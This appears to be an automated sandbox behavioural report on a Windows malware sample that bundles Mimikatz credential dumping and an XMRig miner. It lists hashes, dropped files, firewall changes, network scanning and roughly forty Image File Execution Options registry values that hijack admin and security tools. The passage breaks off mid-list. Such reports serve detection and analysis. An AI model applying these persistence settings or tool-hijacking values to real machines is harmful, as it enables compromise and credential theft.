Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
24-12-2024 12:54
Behavioral task
behavioral1
Sample
2024-12-24_95fce9e61d3584e0f6e908b4fad47f63_hacktools_icedid_mimikatz.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2024-12-24_95fce9e61d3584e0f6e908b4fad47f63_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2024-12-24_95fce9e61d3584e0f6e908b4fad47f63_hacktools_icedid_mimikatz.exe
-
Size
9.9MB
-
MD5
95fce9e61d3584e0f6e908b4fad47f63
-
SHA1
26071cb21930728be85770192502253627a27939
-
SHA256
16e7c4931abda279940e40aefa791792814db31d7036410d5ed27ed39dcf03e6
-
SHA512
e17d102d4fc936394c0d8d684b916c814f610c7f1d4102904c55417b8fe35bbdf8f9ced44209e51b5d2cd66f44de6cd6356e2eb3a099699c4121aed4606c8490
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 2696 created 2044 2696 zyejeil.exe 37 -
Xmrig family
-
Contacts a large (30613) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/4972-178-0x00007FF60F950000-0x00007FF60FA70000-memory.dmp xmrig behavioral2/memory/4972-182-0x00007FF60F950000-0x00007FF60FA70000-memory.dmp xmrig behavioral2/memory/4972-203-0x00007FF60F950000-0x00007FF60FA70000-memory.dmp xmrig behavioral2/memory/4972-212-0x00007FF60F950000-0x00007FF60FA70000-memory.dmp xmrig behavioral2/memory/4972-221-0x00007FF60F950000-0x00007FF60FA70000-memory.dmp xmrig behavioral2/memory/4972-236-0x00007FF60F950000-0x00007FF60FA70000-memory.dmp xmrig behavioral2/memory/4972-247-0x00007FF60F950000-0x00007FF60FA70000-memory.dmp xmrig behavioral2/memory/4972-475-0x00007FF60F950000-0x00007FF60FA70000-memory.dmp xmrig behavioral2/memory/4972-476-0x00007FF60F950000-0x00007FF60FA70000-memory.dmp xmrig behavioral2/memory/4972-478-0x00007FF60F950000-0x00007FF60FA70000-memory.dmp xmrig behavioral2/memory/4972-733-0x00007FF60F950000-0x00007FF60FA70000-memory.dmp xmrig behavioral2/memory/4972-735-0x00007FF60F950000-0x00007FF60FA70000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/208-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/208-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x000b000000023b79-6.dat mimikatz behavioral2/memory/4880-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/2968-138-0x00007FF75E1F0000-0x00007FF75E2DE000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts zyejeil.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts zyejeil.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" zyejeil.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 5000 netsh.exe 2616 netsh.exe -
Executes dropped EXE 28 IoCs
pid Process 4880 zyejeil.exe 2696 zyejeil.exe 4856 wpcap.exe 2156 zqkkhilub.exe 2968 vfshost.exe 4792 ucqzmelym.exe 964 xohudmc.exe 904 joxnkm.exe 4972 ejzklm.exe 2312 ucqzmelym.exe 448 ucqzmelym.exe 4900 ucqzmelym.exe 1616 ucqzmelym.exe 4956 ucqzmelym.exe 3104 ucqzmelym.exe 3736 ucqzmelym.exe 1360 ucqzmelym.exe 1040 ucqzmelym.exe 4792 ucqzmelym.exe 776 ucqzmelym.exe 3176 ucqzmelym.exe 4156 ucqzmelym.exe 2176 ucqzmelym.exe 3800 ucqzmelym.exe 2820 ucqzmelym.exe 2372 zyejeil.exe 4260 nusubcedp.exe 4796 zyejeil.exe -
Loads dropped DLL 12 IoCs
pid Process 4856 wpcap.exe 4856 wpcap.exe 4856 wpcap.exe 4856 wpcap.exe 4856 wpcap.exe 4856 wpcap.exe 4856 wpcap.exe 4856 wpcap.exe 4856 wpcap.exe 2156 zqkkhilub.exe 2156 zqkkhilub.exe 2156 zqkkhilub.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 67 ifconfig.me 68 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\joxnkm.exe xohudmc.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 zyejeil.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft zyejeil.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData zyejeil.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 zyejeil.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\joxnkm.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE zyejeil.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies zyejeil.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 zyejeil.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache zyejeil.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content zyejeil.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\088D7AA6D7DCA369223412E8DEF831B8 zyejeil.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\088D7AA6D7DCA369223412E8DEF831B8 zyejeil.exe -
resource yara_rule behavioral2/files/0x0007000000023c65-134.dat upx behavioral2/memory/2968-136-0x00007FF75E1F0000-0x00007FF75E2DE000-memory.dmp upx behavioral2/memory/2968-138-0x00007FF75E1F0000-0x00007FF75E2DE000-memory.dmp upx behavioral2/files/0x0007000000023c70-141.dat upx behavioral2/memory/4792-142-0x00007FF7AA420000-0x00007FF7AA47B000-memory.dmp upx behavioral2/memory/4792-150-0x00007FF7AA420000-0x00007FF7AA47B000-memory.dmp upx behavioral2/files/0x0007000000023c6d-164.dat upx behavioral2/memory/4972-165-0x00007FF60F950000-0x00007FF60FA70000-memory.dmp upx behavioral2/memory/2312-171-0x00007FF7AA420000-0x00007FF7AA47B000-memory.dmp upx behavioral2/memory/448-175-0x00007FF7AA420000-0x00007FF7AA47B000-memory.dmp upx behavioral2/memory/4972-178-0x00007FF60F950000-0x00007FF60FA70000-memory.dmp upx behavioral2/memory/4900-180-0x00007FF7AA420000-0x00007FF7AA47B000-memory.dmp upx behavioral2/memory/4972-182-0x00007FF60F950000-0x00007FF60FA70000-memory.dmp upx behavioral2/memory/1616-185-0x00007FF7AA420000-0x00007FF7AA47B000-memory.dmp upx behavioral2/memory/4956-189-0x00007FF7AA420000-0x00007FF7AA47B000-memory.dmp upx behavioral2/memory/3104-193-0x00007FF7AA420000-0x00007FF7AA47B000-memory.dmp upx behavioral2/memory/3736-197-0x00007FF7AA420000-0x00007FF7AA47B000-memory.dmp upx behavioral2/memory/1360-201-0x00007FF7AA420000-0x00007FF7AA47B000-memory.dmp upx behavioral2/memory/4972-203-0x00007FF60F950000-0x00007FF60FA70000-memory.dmp upx behavioral2/memory/1040-206-0x00007FF7AA420000-0x00007FF7AA47B000-memory.dmp upx behavioral2/memory/4792-210-0x00007FF7AA420000-0x00007FF7AA47B000-memory.dmp upx behavioral2/memory/4972-212-0x00007FF60F950000-0x00007FF60FA70000-memory.dmp upx behavioral2/memory/776-215-0x00007FF7AA420000-0x00007FF7AA47B000-memory.dmp upx behavioral2/memory/3176-219-0x00007FF7AA420000-0x00007FF7AA47B000-memory.dmp upx behavioral2/memory/4972-221-0x00007FF60F950000-0x00007FF60FA70000-memory.dmp upx behavioral2/memory/4156-224-0x00007FF7AA420000-0x00007FF7AA47B000-memory.dmp upx behavioral2/memory/2176-228-0x00007FF7AA420000-0x00007FF7AA47B000-memory.dmp upx behavioral2/memory/3800-231-0x00007FF7AA420000-0x00007FF7AA47B000-memory.dmp upx behavioral2/memory/2820-233-0x00007FF7AA420000-0x00007FF7AA47B000-memory.dmp upx behavioral2/memory/4972-236-0x00007FF60F950000-0x00007FF60FA70000-memory.dmp upx behavioral2/memory/4972-247-0x00007FF60F950000-0x00007FF60FA70000-memory.dmp upx behavioral2/memory/4972-475-0x00007FF60F950000-0x00007FF60FA70000-memory.dmp upx behavioral2/memory/4972-476-0x00007FF60F950000-0x00007FF60FA70000-memory.dmp upx behavioral2/memory/4972-478-0x00007FF60F950000-0x00007FF60FA70000-memory.dmp upx behavioral2/memory/4972-733-0x00007FF60F950000-0x00007FF60FA70000-memory.dmp upx behavioral2/memory/4972-735-0x00007FF60F950000-0x00007FF60FA70000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\lrcwzntnt\UnattendGC\vimpcsvc.xml zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\docmicfg.xml zyejeil.exe File opened for modification C:\Windows\lrcwzntnt\Corporate\log.txt cmd.exe File opened for modification C:\Windows\uzepkltb\spoolsrv.xml zyejeil.exe File created C:\Windows\lrcwzntnt\bmkbibntg\scan.bat zyejeil.exe File opened for modification C:\Windows\lrcwzntnt\bmkbibntg\Packet.dll zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\svschost.xml zyejeil.exe File created C:\Windows\uzepkltb\schoedcl.xml zyejeil.exe File created C:\Windows\lrcwzntnt\bmkbibntg\wpcap.exe zyejeil.exe File created C:\Windows\lrcwzntnt\bmkbibntg\zqkkhilub.exe zyejeil.exe File created C:\Windows\lrcwzntnt\bmkbibntg\nusubcedp.exe zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\svschost.exe zyejeil.exe File created C:\Windows\lrcwzntnt\Corporate\mimidrv.sys zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\xdvl-0.dll zyejeil.exe File created C:\Windows\lrcwzntnt\Corporate\mimilib.dll zyejeil.exe File created C:\Windows\lrcwzntnt\upbdrjv\swrpwe.exe zyejeil.exe File created C:\Windows\uzepkltb\zyejeil.exe 2024-12-24_95fce9e61d3584e0f6e908b4fad47f63_hacktools_icedid_mimikatz.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\libeay32.dll zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\schoedcl.xml zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\schoedcl.xml zyejeil.exe File created C:\Windows\uzepkltb\vimpcsvc.xml zyejeil.exe File created C:\Windows\ime\zyejeil.exe zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\docmicfg.xml zyejeil.exe File opened for modification C:\Windows\uzepkltb\svschost.xml zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\crli-0.dll zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\exma-1.dll zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\tucl-1.dll zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\zlib1.dll zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\spoolsrv.exe zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\spoolsrv.xml zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\coli-0.dll zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\ssleay32.dll zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\trch-1.dll zyejeil.exe File opened for modification C:\Windows\uzepkltb\schoedcl.xml zyejeil.exe File opened for modification C:\Windows\lrcwzntnt\bmkbibntg\Result.txt nusubcedp.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\trfo-2.dll zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\vimpcsvc.exe zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\spoolsrv.xml zyejeil.exe File created C:\Windows\uzepkltb\spoolsrv.xml zyejeil.exe File created C:\Windows\lrcwzntnt\Corporate\vfshost.exe zyejeil.exe File created C:\Windows\uzepkltb\docmicfg.xml zyejeil.exe File opened for modification C:\Windows\uzepkltb\vimpcsvc.xml zyejeil.exe File opened for modification C:\Windows\uzepkltb\docmicfg.xml zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\AppCapture64.dll zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\cnli-1.dll zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\tibe-2.dll zyejeil.exe File opened for modification C:\Windows\uzepkltb\zyejeil.exe 2024-12-24_95fce9e61d3584e0f6e908b4fad47f63_hacktools_icedid_mimikatz.exe File created C:\Windows\lrcwzntnt\bmkbibntg\Packet.dll zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\vimpcsvc.xml zyejeil.exe File created C:\Windows\uzepkltb\svschost.xml zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\Shellcode.ini zyejeil.exe File created C:\Windows\lrcwzntnt\bmkbibntg\ip.txt zyejeil.exe File created C:\Windows\lrcwzntnt\bmkbibntg\wpcap.dll zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\docmicfg.exe zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\svschost.xml zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\AppCapture32.dll zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\libxml2.dll zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\posh-0.dll zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\ucl.dll zyejeil.exe File created C:\Windows\lrcwzntnt\UnattendGC\specials\schoedcl.exe zyejeil.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2936 sc.exe 3720 sc.exe 3248 sc.exe 3012 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened 